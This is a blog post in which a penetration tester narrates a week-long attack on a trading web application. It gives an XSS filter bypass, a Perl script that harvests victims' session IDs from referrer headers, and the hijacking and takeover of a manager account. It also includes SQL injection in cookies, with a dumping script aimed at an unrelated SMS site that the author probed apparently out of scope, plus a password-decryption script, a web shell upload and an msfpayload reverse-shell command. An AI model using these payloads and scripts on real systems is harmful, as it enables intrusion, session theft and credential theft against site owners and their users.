View RSS Feed

Fb1h2s aka Rahul Sasi's Blog

XSS too Root

Rating: 9 votes, 3.78 average.
Last week I was assigned with a WPT , where I was assigned to PT a Web Application
Normally in WPT s you will find a lot of bugs if you spend some good time analyzing the application in and out. And Tools like Web Inspect and Appscan are also of a good help to one extend.

But the application I was testing had some sort of filter which prevented the possibilities of any sort of normal web application attacks, and redirected all malicious request to one common error page.And I was almost going mad.

It was a module where users could trade objects and three type of users where there Anonymous Users,Manager Users and as always a super user.Any one could access the anonymous user as the user name password was open for all, after loging in as Anonymous you could trade your things with other users , provided the managers accept it.As all your submissions went via the manager users.

The application dint used any cookies instead it used a session ID , which was passed in on every request via [GET] method
Code:
http://site.com/usrpage/?userid={D8A349A7-3503-4283-A1AA-9406DB6EE9C5}
So what strike me was as that the user session Id hold the authentication and if I could get hold of another valid session I could be in that user privileges. And the only possible way is by tracking the HTTP_REFERRER value. And this could be only possible by making the administrator/manager clicking one of our links form the application. And then we could Hijack the user session. For those who are not aware of what am talking about, read a similar scenario .
http://fb1h2s.com/view.php?article_id=8

In order to achieve that, I need to find an XSS in the section where I could post my data for the manager approval or if managed to send a Hyperlink which when clicked, "boomed" my back end program will store the SessionIds.
But with the current filter which is blocking all unwanted request it was hardly possible.

And I was all stuck at this part, I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time VInay "vinnu" bro was online and was all ready for help . I presented my scenario of the Filter and that I want to bypass that he gave me few cool tips , in which converting the Payload string that was a hyper link
Code:
<link href="http://evilsite.com/evilscript.py" />
bypassed the filter when half the string was hex encoded and other half was double hexed .

So now First phase is done and I almost wasted one day .

Day 2 :

Now that I know that I could send the managers with a hyper link and trick him to click the link stating that it was some wonderful products review. But the problem was that I don't know when the manager users will login and administrate my stuffs and the sessions will remain valid only till the user clicks Logout. And I wont be able to stay 24/7 online waiting for the manager to come online.
Even though I stay 3/4 of my time online, I need a better idea
.

So I taught of writing an SMS alert application, which will send me an SMS to my phone when ever the click was initiated . So i could come online immediately and use the sessions. I chose 160by2.com for this and planned to automate it via perl CGI.
Why perl? because Apache was by default configured to handle perl CGI
While analyzing the 160by2.com for automating the request I found an SQL injection in one of the Post methods and started playing around with it and wasted few hours. And by night the code was all ready and I send the hyperlink to the victims with a convincing text.

Code:
#!c:/perl/bin/perl.exe
#CGI perl woot woot by fb1h2s
use CGI;
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
#lets save session first
open (MYFILE, '>>session.txt);
print MYFILE "\t$ENV{HTTP_REFERER}\n\n";
print MYFILE "\t$ENV{HTTP_USER_AGENT}\n\n";
print MYFILE "\t$ENV{HTTP_ACCEPT}\n\n";
print MYFILE "\t$ENV{REMOTE_ADDR}\n\n";
close (MYFILE);
#inform the master via sms now
my $url = "http://160by2.com/";
my $mobileno = "mymobno"; #usernameno
my $password = "mypass";     #password
my $mobilewoot ="smstothisno"; #no to recive alert
my $woot_woot = " woot woot"; #msg text
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#my $output_page = $mech->content();
#print "$output_page";
$mech->form_id('login_form');
$mech->field(htxt_UserName => $mobileno);
$mech->field(txt_Passwd => $password);
$mech->click();
$mech->get("http://www.160by2.com/compose_sms.aspx");
$mech->form_id('frmcompose');
$mech->field(txt_msg => $woot_woot);
$mech->field(txt_mobileno => $mobilewoot);
#//"figure the rest out "
$mech->click();
#my $output_page1 = $mech->content();
#print "$output_page1";
Day 3:

Bye the next day evening by dinner time I got my "woot woot" Sms from my program confirming the click and I just hurried online and gained a manager session . Now it was again disappointing , there where options to manage the transactions and all approve and deny stuffs, but nothing good to proceed further was found. All manager pages too were filtered for any sql injection and other stuffs, so reached another dead end. By the way I dint forget to update the accounts Email Id with mine and Secret Question and answer so that I could get inside again .

Day 4:
I reset the manager password and gain access to manager interface, and kept analyzing the applications each and every fields, and by noon I noticed
that few state cookies were saved , which was used to confirm that no manipulation in datas are done , some sort of security feature . I used my fav ad-don tamper data to manipulate that request and altered it with an SQL injection check. Yepiiiiiii there I got an SQL bug finally in some session cookies huhhhh. I dumped few user names and passwords , the password dint had the look of a password though, It was sort of jumpled up, but I dnt hesitate to try them out , but none dint work. So taught of of dumping the whole database and trying them out, but the problem was that it was it was on the session cookies and I wasn't aware of any tools which would satisfy my needs, And I went around asking people whether they were aware of any such tools, and was disappointed, so taught of writing one as that it would be impossible to dump the entire datas.

What I did was, grabbed a copy of rasurons darmssql.py which supported GET method and Union based Injection, and modified it to support POST request + Error Based injection.
Code:
def GetTheShit(head_URL):
        try:
                #print "\nam here",head_URL
                file.write("\n[debug] "+head_URL)
                connection = HTTPConnection("m.160by2.com")
                head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain" ,"Referer" :"http://manycloe.com","Cookie":"State_date=head_url"}
                parameters = urlencode({"fileds_value" : "sas", fileds_value" : "sas","cmdSubmit" : "Submit"}) 
                connection.request("POST", "/GetPW.asp", parameters, head)
                r2 = connection.getresponse()
                source = r2.read()
                #print source
                match = re.findall("value '[\d\D]*' to",source)
                match = match[0][7:-4]
                print 
                return match
        except (KeyboardInterrupt, SystemExit):
                raise
        except:
                pass
Get_shit was darkmssqls HTTP connection engine

Day 5:

Code successfully dumped all passwords users and a
A sample out put is given here
Code:
hsklyu
qez}zJN
neuktuGKO
It was some kind of custom build build encryption, there is no way I could do something unless and until I find the algorithm. And the only possible way to figure that was the Change password option. So I reset my current password with few test values and obtained these results.
Code:
1234 == 26:>
aaaa == behk

Whuhuuu it was just another stupid algorithm,
String =String[i+3] was the logic :D
Security via Ob-security
Made another quick script which decrypted all the passwords. And later added this POC-Code too to the report.

Code:
#python 2.5
#POC Program to decrypt the encrypted password
#Programmed by my name my company tech
print "[+]Week encryption POC by "
encry= raw_input("[+]Enter Encrypted Password:")
pwd =[]
leng =len (encry)
init =1
for i in range(0,leng):
    temp=ord(encry[i])
    f =chr(temp-init)
    init = init + 3
    pwd.append(f)
print "Decrypted password:"
print "".join(pwd)
Day 6:

And the pass cracking lead me a way to the Super Admin account , and there it was a file upload utility which let me upload anything I simply uploaded a simple ASP.NET command shell as other web shell were detected and deleted by Anti virus of that server. And then I made a Metpreter reverse Executable using metsploit

Code:
./msfpayload windows/shell/reverse_tcp LHOST=myhost LPORT=31337 X > c:\\sas.exe
 Uploaded it to server and called it via the command shell and made a msf Multi handler listen for connection.

> use multi handler


And there I had a session with NT/Authority priv a Shell is just a beginning, but my scope of work was over there.

I Was damn happy after after my tiresome chase after this application. Felt really great, my be because It took a week to reach the goal .
Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

  1. r3dsm0k3's Avatar
    You Rocks ..!

Trackbacks

Total Trackbacks 0
Trackback URL: